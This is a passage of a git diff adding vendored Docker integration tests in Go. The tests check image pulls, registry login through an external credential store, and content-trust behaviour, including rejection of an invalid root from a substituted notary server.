+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// Inject a manifest list into the registry
+	manifestList := &manifestlist.ManifestList{
+		Versioned: manifest.Versioned{
+			SchemaVersion: 2,
+			MediaType:     manifestlist.MediaTypeManifestList,
+		},
+		Manifests: []manifestlist.ManifestDescriptor{
+			{
+				Descriptor: distribution.Descriptor{
+					Digest:    "sha256:1a9ec845ee94c202b2d5da74a24f0ed2058318bfa9879fa541efaecba272e86b",
+					Size:      3253,
+					MediaType: schema2.MediaTypeManifest,
+				},
+				Platform: manifestlist.PlatformSpec{
+					Architecture: "bogus_arch",
+					OS:           "bogus_os",
+				},
+			},
+			{
+				Descriptor: distribution.Descriptor{
+					Digest:    pushDigest,
+					Size:      3253,
+					MediaType: schema2.MediaTypeManifest,
+				},
+				Platform: manifestlist.PlatformSpec{
+					Architecture: runtime.GOARCH,
+					OS:           runtime.GOOS,
+				},
+			},
+		},
+	}
+
+	manifestListJSON, err := json.MarshalIndent(manifestList, "", "   ")
+	c.Assert(err, checker.IsNil, check.Commentf("error marshalling manifest list"))
+
+	manifestListDigest := digest.FromBytes(manifestListJSON)
+	hexDigest := manifestListDigest.Hex()
+
+	registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2")
+
+	// Write manifest list to blob store
+	blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest)
+	err = os.MkdirAll(blobDir, 0755)
+	c.Assert(err, checker.IsNil, check.Commentf("error creating blob dir"))
+	blobPath := filepath.Join(blobDir, "data")
+	err = ioutil.WriteFile(blobPath, []byte(manifestListJSON), 0644)
+	c.Assert(err, checker.IsNil, check.Commentf("error writing manifest list"))
+
+	// Add to revision store
+	revisionDir := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "revisions", "sha256", hexDigest)
+	err = os.Mkdir(revisionDir, 0755)
+	c.Assert(err, checker.IsNil, check.Commentf("error creating revision dir"))
+	revisionPath := filepath.Join(revisionDir, "link")
+	err = ioutil.WriteFile(revisionPath, []byte(manifestListDigest.String()), 0644)
+	c.Assert(err, checker.IsNil, check.Commentf("error writing revision link"))
+
+	// Update tag
+	tagPath := filepath.Join(registryV2Path, "repositories", remoteRepoName, "_manifests", "tags", "latest", "current", "link")
+	err = ioutil.WriteFile(tagPath, []byte(manifestListDigest.String()), 0644)
+	c.Assert(err, checker.IsNil, check.Commentf("error writing tag link"))
+
+	// Verify that the image can be pulled through the manifest list.
+	out, _ := dockerCmd(c, "pull", repoName)
+
+	// The pull output includes "Digest: <digest>", so find that
+	matches := digestRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
+	pullDigest := matches[1]
+
+	// Make sure the pushed and pull digests match
+	c.Assert(manifestListDigest.String(), checker.Equals, pullDigest)
+
+	// Was the image actually created?
+	dockerCmd(c, "inspect", repoName)
+
+	dockerCmd(c, "rmi", repoName)
+}
+
+// #23100
+func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithScheme(c *check.C) {
+	osPath := os.Getenv("PATH")
+	defer os.Setenv("PATH", osPath)
+
+	workingDir, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth"))
+	c.Assert(err, checker.IsNil)
+	testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute)
+
+	os.Setenv("PATH", testPath)
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL)
+
+	tmp, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+
+	externalAuthConfig := `{ "credsStore": "shell-test" }`
+
+	configPath := filepath.Join(tmp, "config.json")
+	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	b, err := ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":")
+
+	dockerCmd(c, "--config", tmp, "tag", "busybox", repoName)
+	dockerCmd(c, "--config", tmp, "push", repoName)
+
+	dockerCmd(c, "--config", tmp, "logout", privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "pull", repoName)
+
+	// likewise push should work
+	repoName2 := fmt.Sprintf("%v/dockercli/busybox:nocreds", privateRegistryURL)
+	dockerCmd(c, "tag", repoName, repoName2)
+	dockerCmd(c, "--config", tmp, "push", repoName2)
+
+	// logout should work w scheme also because it will be stripped
+	dockerCmd(c, "--config", tmp, "logout", "https://"+privateRegistryURL)
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) {
+	osPath := os.Getenv("PATH")
+	defer os.Setenv("PATH", osPath)
+
+	workingDir, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth"))
+	c.Assert(err, checker.IsNil)
+	testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute)
+
+	os.Setenv("PATH", testPath)
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL)
+
+	tmp, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+
+	externalAuthConfig := `{ "credsStore": "shell-test" }`
+
+	configPath := filepath.Join(tmp, "config.json")
+	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	b, err := ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":")
+
+	dockerCmd(c, "--config", tmp, "tag", "busybox", repoName)
+	dockerCmd(c, "--config", tmp, "push", repoName)
+
+	dockerCmd(c, "--config", tmp, "pull", repoName)
+}
+
+// TestRunImplicitPullWithNoTag should pull implicitly only the default tag (latest)
+func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repo := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	repoTag1 := fmt.Sprintf("%v:latest", repo)
+	repoTag2 := fmt.Sprintf("%v:t1", repo)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoTag1)
+	dockerCmd(c, "tag", "busybox", repoTag2)
+	dockerCmd(c, "push", repo)
+	dockerCmd(c, "rmi", repoTag1)
+	dockerCmd(c, "rmi", repoTag2)
+
+	out, _, err := dockerCmdWithError("run", repo)
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo))
+
+	// There should be only one line for repo, the one with repo:latest
+	outImageCmd, _, err := dockerCmdWithError("images", repo)
+	splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n")
+	c.Assert(splitOutImageCmd, checker.HasLen, 2)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
new file mode 100644
index 0000000000..a0118a8e95
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go
@@ -0,0 +1,274 @@
+package main
+
+import (
+	"fmt"
+	"regexp"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client
+// prints all expected output.
+func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out := s.Cmd(c, "pull", "hello-world")
+	defer deleteImages("hello-world")
+
+	c.Assert(out, checker.Contains, "Using default tag: latest", check.Commentf("expected the 'latest' tag to be automatically assumed"))
+	c.Assert(out, checker.Contains, "Pulling from library/hello-world", check.Commentf("expected the 'library/' prefix to be automatically assumed"))
+	c.Assert(out, checker.Contains, "Downloaded newer image for hello-world:latest")
+
+	matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1)
+	c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output"))
+	c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest"))
+	_, err := digest.ParseDigest(matches[0][1])
+	c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1]))
+
+	// We should have a single entry in images.
+	img := strings.TrimSpace(s.Cmd(c, "images"))
+	splitImg := strings.Split(img, "\n")
+	c.Assert(splitImg, checker.HasLen, 2)
+	c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name"))
+}
+
+// TestPullNonExistingImage pulls non-existing images from the central registry, with different
+// combinations of implicit tag and library prefix.
+func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	type entry struct {
+		repo  string
+		alias string
+		tag   string
+	}
+
+	entries := []entry{
+		{"asdfasdf", "asdfasdf", "foobar"},
+		{"asdfasdf", "library/asdfasdf", "foobar"},
+		{"asdfasdf", "asdfasdf", ""},
+		{"asdfasdf", "asdfasdf", "latest"},
+		{"asdfasdf", "library/asdfasdf", ""},
+		{"asdfasdf", "library/asdfasdf", "latest"},
+	}
+
+	// The option field indicates "-a" or not.
+	type record struct {
+		e      entry
+		option string
+		out    string
+		err    error
+	}
+
+	// Execute 'docker pull' in parallel, pass results (out, err) and
+	// necessary information ("-a" or not, and the image name) to channel.
+	var group sync.WaitGroup
+	recordChan := make(chan record, len(entries)*2)
+	for _, e := range entries {
+		group.Add(1)
+		go func(e entry) {
+			defer group.Done()
+			repoName := e.alias
+			if e.tag != "" {
+				repoName += ":" + e.tag
+			}
+			out, err := s.CmdWithError("pull", repoName)
+			recordChan <- record{e, "", out, err}
+		}(e)
+		if e.tag == "" {
+			// pull -a on a nonexistent registry should fall back as well
+			group.Add(1)
+			go func(e entry) {
+				defer group.Done()
+				out, err := s.CmdWithError("pull", "-a", e.alias)
+				recordChan <- record{e, "-a", out, err}
+			}(e)
+		}
+	}
+
+	// Wait for completion
+	group.Wait()
+	close(recordChan)
+
+	// Process the results (out, err).
+	for record := range recordChan {
+		if len(record.option) == 0 {
+			c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out))
+			c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages"))
+		} else {
+			// pull -a on a nonexistent registry should fall back as well
+			c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out))
+			c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages"))
+			c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`))
+		}
+	}
+
+}
+
+// TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies
+// that pulling the same image with different combinations of implicit elements of the the image
+// reference (tag, repository, central registry url, ...) doesn't trigger a new pull nor leads to
+// multiple images.
+func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// Pull hello-world from v2
+	pullFromV2 := func(ref string) (int, string) {
+		out := s.Cmd(c, "pull", "hello-world")
+		v1Retries := 0
+		for strings.Contains(out, "this image was pulled from a legacy registry") {
+			// Some network errors may cause fallbacks to the v1
+			// protocol, which would violate the test's assumption
+			// that it will get the same images. To make the test
+			// more robust against these network glitches, allow a
+			// few retries if we end up with a v1 pull.
+
+			if v1Retries > 2 {
+				c.Fatalf("too many v1 fallback incidents when pulling %s", ref)
+			}
+
+			s.Cmd(c, "rmi", ref)
+			out = s.Cmd(c, "pull", ref)
+
+			v1Retries++
+		}
+
+		return v1Retries, out
+	}
+
+	pullFromV2("hello-world")
+	defer deleteImages("hello-world")
+
+	s.Cmd(c, "tag", "hello-world", "hello-world-backup")
+
+	for _, ref := range []string{
+		"hello-world",
+		"hello-world:latest",
+		"library/hello-world",
+		"library/hello-world:latest",
+		"docker.io/library/hello-world",
+		"index.docker.io/library/hello-world",
+	} {
+		var out string
+		for {
+			var v1Retries int
+			v1Retries, out = pullFromV2(ref)
+
+			// Keep repeating the test case until we don't hit a v1
+			// fallback case. We won't get the right "Image is up
+			// to date" message if the local image was replaced
+			// with one pulled from v1.
+			if v1Retries == 0 {
+				break
+			}
+			s.Cmd(c, "rmi", ref)
+			s.Cmd(c, "tag", "hello-world-backup", "hello-world")
+		}
+		c.Assert(out, checker.Contains, "Image is up to date for hello-world:latest")
+	}
+
+	s.Cmd(c, "rmi", "hello-world-backup")
+
+	// We should have a single entry in images.
+	img := strings.TrimSpace(s.Cmd(c, "images"))
+	splitImg := strings.Split(img, "\n")
+	c.Assert(splitImg, checker.HasLen, 2)
+	c.Assert(splitImg[1], checker.Matches, `hello-world\s+latest.*?`, check.Commentf("invalid output for `docker images` (expected image and tag name"))
+}
+
+// TestPullScratchNotAllowed verifies that pulling 'scratch' is rejected.
+func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, err := s.CmdWithError("pull", "scratch")
+	c.Assert(err, checker.NotNil, check.Commentf("expected pull of scratch to fail"))
+	c.Assert(out, checker.Contains, "'scratch' is a reserved name")
+	c.Assert(out, checker.Not(checker.Contains), "Pulling repository scratch")
+}
+
+// TestPullAllTagsFromCentralRegistry pulls using `all-tags` for a given image and verifies that it
+// results in more images than a naked pull.
+func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	s.Cmd(c, "pull", "busybox")
+	outImageCmd := s.Cmd(c, "images", "busybox")
+	splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n")
+	c.Assert(splitOutImageCmd, checker.HasLen, 2)
+
+	s.Cmd(c, "pull", "--all-tags=true", "busybox")
+	outImageAllTagCmd := s.Cmd(c, "images", "busybox")
+	linesCount := strings.Count(outImageAllTagCmd, "\n")
+	c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd))
+
+	// Verify that the line for 'busybox:latest' is left unchanged.
+	var latestLine string
+	for _, line := range strings.Split(outImageAllTagCmd, "\n") {
+		if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") {
+			latestLine = line
+			break
+		}
+	}
+	c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags"))
+	splitLatest := strings.Fields(latestLine)
+	splitCurrent := strings.Fields(splitOutImageCmd[1])
+
+	// Clear relative creation times, since these can easily change between
+	// two invocations of "docker images". Without this, the test can fail
+	// like this:
+	// ... obtained []string = []string{"busybox", "latest", "d9551b4026f0", "27", "minutes", "ago", "1.113", "MB"}
+	// ... expected []string = []string{"busybox", "latest", "d9551b4026f0", "26", "minutes", "ago", "1.113", "MB"}
+	splitLatest[3] = ""
+	splitLatest[4] = ""
+	splitLatest[5] = ""
+	splitCurrent[3] = ""
+	splitCurrent[4] = ""
+	splitCurrent[5] = ""
+
+	c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags"))
+}
+
+// TestPullClientDisconnect kills the client during a pull operation and verifies that the operation
+// gets cancelled.
+//
+// Ref: docker/docker#15589
+func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repoName := "hello-world:latest"
+
+	pullCmd := s.MakeCmd("pull", repoName)
+	stdout, err := pullCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+	err = pullCmd.Start()
+	c.Assert(err, checker.IsNil)
+
+	// Cancel as soon as we get some output.
+	buf := make([]byte, 10)
+	_, err = stdout.Read(buf)
+	c.Assert(err, checker.IsNil)
+
+	err = pullCmd.Process.Kill()
+	c.Assert(err, checker.IsNil)
+
+	time.Sleep(2 * time.Second)
+	_, err = s.CmdWithError("inspect", repoName)
+	c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected"))
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) {
+	// we don't care about the actual image, we just want to see image not found
+	// because that means v2 call returned 401 and we fell back to v1 which usually
+	// gives a 404 (in this case the test registry doesn't handle v1 at all)
+	out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Error: image busybox:latest not found")
+}
+
+// Regression test for https://github.com/docker/docker/issues/26429
+func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) {
+	testRequires(c, DaemonIsWindows, Network)
+	_, _, err := dockerCmdWithError("pull", "ubuntu")
+	c.Assert(err.Error(), checker.Contains, "cannot be used on this platform")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
new file mode 100644
index 0000000000..96a42d6758
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go
@@ -0,0 +1,365 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerTrustSuite) TestTrustedPull(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-pull")
+
+	// Try pull
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err := runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
+
+	dockerCmd(c, "rmi", repoName)
+	// Try untrusted pull to ensure we pushed the tag to the registry
+	pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
+
+}
+
+func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-isolated-pull")
+
+	// Try pull (run from isolated directory without trust information)
+	pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err := runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out)))
+
+	dockerCmd(c, "rmi", repoName)
+}
+
+func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	dockerCmd(c, "push", repoName)
+	dockerCmd(c, "rmi", repoName)
+
+	// Try trusted pull on untrusted tag
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err := runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) {
+	c.Skip("Currently changes system time, causing instability")
+	repoName := s.setupTrustedImage(c, "trusted-cert-expired")
+
+	// Certificates have 10 years of expiration
+	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try pull
+		pullCmd := exec.Command(dockerBinary, "pull", repoName)
+		s.trustedCmd(pullCmd)
+		out, _, err := runCommandWithOutput(pullCmd)
+
+		c.Assert(err, check.NotNil, check.Commentf(out))
+		c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out))
+	})
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try pull
+		pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName)
+		s.trustedCmd(pullCmd)
+		out, _, err := runCommandWithOutput(pullCmd)
+
+		c.Assert(err, check.IsNil, check.Commentf(out))
+		c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out))
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL)
+	evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir")
+	if err != nil {
+		c.Fatalf("Failed to create local temp dir")
+	}
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
+	dockerCmd(c, "rmi", repoName)
+
+	// Try pull
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
+	dockerCmd(c, "rmi", repoName)
+
+	// Kill the notary server, start a new "evil" one.
+	s.not.Close()
+	s.not, err = newTestNotary(c)
+
+	c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed."))
+
+	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
+	// tag an image and upload it to the private registry
+	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
+
+	// Push up to the new server
+	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
+
+	// Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid.
+	pullCmd = exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	if err == nil {
+		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
+	}
+	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
+		c.Fatalf("Missing expected output on trusted pull:\n%s", out)
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) {
+	c.Skip("Currently changes system time, causing instability")
+	repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	// Push with default passphrases
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Snapshots last for three years. This should be expired
+	fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4)
+
+	runAtDifferentDate(fourYearsLater, func() {
+		// Try pull
+		pullCmd := exec.Command(dockerBinary, "pull", repoName)
+		s.trustedCmd(pullCmd)
+		out, _, err = runCommandWithOutput(pullCmd)
+
+		c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots"))
+		c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out))
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-offline-pull")
+
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver")
+	out, _, err := runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out))
+	// Do valid trusted pull to warm cache
+	pullCmd = exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try pull again with invalid notary server, should use cache
+	pullCmd = exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver")
+	out, _, err = runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete")
+	// tag the image and upload it to the private registry
+	_, err := buildImage(repoName, `
+                    FROM busybox
+                    CMD echo trustedpulldelete
+                `, true)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted push: %s\n%s", err, out)
+	}
+	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	if out, status := dockerCmd(c, "rmi", repoName); status != 0 {
+		c.Fatalf("Error removing image %q\n%s", repoName, out)
+	}
+
+	// Try pull
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	matches := digestRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
+	pullDigest := matches[1]
+
+	imageID := inspectField(c, repoName, "Id")
+
+	imageByDigest := repoName + "@" + pullDigest
+	byDigestID := inspectField(c, imageByDigest, "Id")
+
+	c.Assert(byDigestID, checker.Equals, imageID)
+
+	// rmi of tag should also remove the digest reference
+	dockerCmd(c, "rmi", repoName)
+
+	_, err = inspectFieldWithError(imageByDigest, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed"))
+
+	_, err = inspectFieldWithError(imageID, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted"))
+}
+
+func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) {
+	testRequires(c, NotaryHosting)
+	repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+
+	// Push with targets first, initializing the repo
+	dockerCmd(c, "tag", "busybox", targetName)
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	s.assertTargetInRoles(c, repoName, "latest", "targets")
+
+	// Try pull, check we retrieve from targets role
+	pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "retrieving target for targets role")
+
+	// Now we'll create the releases role, and try pushing and pulling
+	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
+	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
+	s.notaryPublish(c, repoName)
+
+	// try a pull, check that we can still pull because we can still read the
+	// old tag in the targets role
+	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "retrieving target for targets role")
+
+	// try a pull -a, check that it succeeds because we can still pull from the
+	// targets role
+	pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	// Push, should sign with targets/releases
+	dockerCmd(c, "tag", "busybox", targetName)
+	pushCmd = exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+	s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases")
+
+	// Try pull, check we retrieve from targets/releases role
+	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(out, checker.Contains, "retrieving target for targets/releases role")
